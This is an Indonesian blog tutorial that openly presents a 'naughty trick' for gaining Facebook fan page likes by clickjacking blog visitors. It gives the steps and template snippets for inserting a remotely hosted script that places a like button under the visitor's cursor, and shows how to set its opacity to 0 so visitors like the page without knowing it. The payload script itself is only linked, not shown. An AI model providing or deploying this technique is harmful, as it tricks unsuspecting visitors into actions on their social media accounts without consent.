Membuat Auto Like Facebook Fans Page di Blogger

Auto Like Facebook Fans Page. Kita semua tentu mengenal media sosial facebook. Saat ini penggunaan facebook sudah berkembang pesat, tidak cuma sekedar menjadi media sosial saja tetapi sudah merambah ke media internet marketing, tentu anda juga sudah sering lihat promosi berbagai macam produk seperti fashion dll. Kalau anda mempunyai akun facebook pasti sudah sering melihat status facebook yang menawarkan berbagai macam produk, jasa dan lain sebagainya. Untuk para blogger atau webmaster facebook juga mempunyai peran sangat penting untuk meningkatkan pengunjungnya melalui fasilitas Facebook Fans Page. Untuk mendapatkan like facebook fans page yang melimpah untuk blogger newbie tentu sangat susah, diperlukan keahlian dalam menulis dan penyampaian serta informasi yang banyak dibutuhkan orang contoh kecilnya mungkin seperti info lowongan kerja terbaru 2012, kata mutiara, kata bijak, info sepak bola dan lain-lain. Tapi semua itu juga membutuhkan proses yang tidak cepat karena biasanya artikel-artikel semacam itu sudah dikuasai oleh para webmaster.

Blog yang sudah mempunyai ribuan Fans Page tidak akan khawatir blognya sepi dan tentu itu juga berpeluang mendapatkan income yang lumayan dari internet.



Tapi sobat PoztART jangan khawatir ada sedikit cara nakal untuk mendapatkan like fans page facebook dari para pengunjung blog dengan sedikit memasukkan javascript.

1. Langsung saja untuk scriptnya bisa sobat [download/copas] disini.
2. Upload script tersebut ke Google Code atau ke hosting sobat sendiri. Kalau sobat tidak bisa caranya mengupload script ke google code tinggal cari saja tutorialnya di google. Kalau proses upload selesai sobat akan mendapatkan url seperti ini http://namascriptanda.googlecode.com/files/namaanda.js
3. Kalau sudah, masuk ke Rancangan > Edit HTML dan cari kode </head> kemudian masukkan script berikut di atas kode </head>
<script language='javascript'>var fan_page_url = &#39;http://www.facebook.com/pages/FACEBOOK_FANS_PAGE&#39;
var opacity = 0.6;
var time = 60000;</script>
4. Kalau sudah selesai coba cari lagi kode <body> dan masukkan kode berikut dibawah kode <body>
<script language='javascript' src= http://namascriptanda.googlecode.com/files/namaanda.js '/>
5. Simpan dan selesai

Ganti url berwarna hijau dengan url facebook fans page sobat dan ganti kode yang berwarna merah dengan kode sobat. Setelah semua selesai sobat bisa cek dulu apakah langkah-langkah sudah benar semua, kalau semua langkah diterapkan dengan benar akan muncul tombol like facebook di cursor blog Anda secara transparan. Nah untuk menghapus tombol like facebook agar tidak kelihatan sobat tinggal merubah angka var opacity menjadi 0.

Berhasil? OK ternyata mudah sekali membuat auto like fans page facebook di blogger. Itulah sedikit cara nakal membuat auto like fans page facebook dengan script sederhana. Ayo langsung praktek kalau Anda pengin melihat hasilnya.